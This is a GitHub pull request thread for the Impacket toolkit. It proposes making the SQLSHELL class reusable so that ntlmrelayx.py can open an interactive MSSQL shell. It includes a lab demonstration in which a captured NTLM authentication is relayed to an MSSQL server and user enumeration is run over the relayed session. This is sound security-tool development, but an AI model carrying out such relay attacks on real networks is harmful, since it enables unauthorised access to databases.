Make class SQLSHELL accessible outside of the mssqlclient.py example

[sploutchy]

One may need a SQLSHELL in other examples ;)

[gabrielg5]

Hi @sploutchy, thanks for your PR!

we were discussing this with the team yesterday, do you have another examples that could leverage of this change?

[sploutchy]

Here is an example:
42247b2

┌──(hacker㉿kali)-[~]
└─$ ntlmrelayx.py -t mssql://ws1.child.testlab.local -i -smb2support --no-multirelay  
Impacket v0.10.1.dev1+20230425.94702.fadd61c8 - Copyright 2022 Fortra

[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.0.1.101, attacking target mssql://ws1.child.testlab.local
[*] Authenticating against mssql://ws1.child.testlab.local as CHILD/DDRAKE SUCCEED
[!] Press help for extra shell commands
SQL (child\ddrake  guest@master)> enum_users                                                                                                                                                   
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL   
SQL (child\ddrake  guest@master)>                                                                                                                                                     

[gabrielg5]

have you seen this blog post Playing with Relayed Credentials?

There's a sample down there that allows this same feature through proxychains. Do you see some benefits on one approach over the other?

[sploutchy]

I read the blog post a long time ago but forgot that MSSQL was also possible through SOCKS, that's neat.
I still like having the option to perform direct attacks for some use-cases (e.g. relaying one specific connection with better user friendliness).
Cheers

[gabrielg5]

to master. thank you!!

[CryingWelkin]

@0xdeaddood @gabrielg5 @sploutchy After receiving an interactive shell SQL session, everything breaks. I need to use the reset command to see the output. I suggest reviewing this PR again.

[gabrielg5]

Hi @PedantHTB,
yes there's something wrong there. Thanks for the heads up!
Creating an issue to check it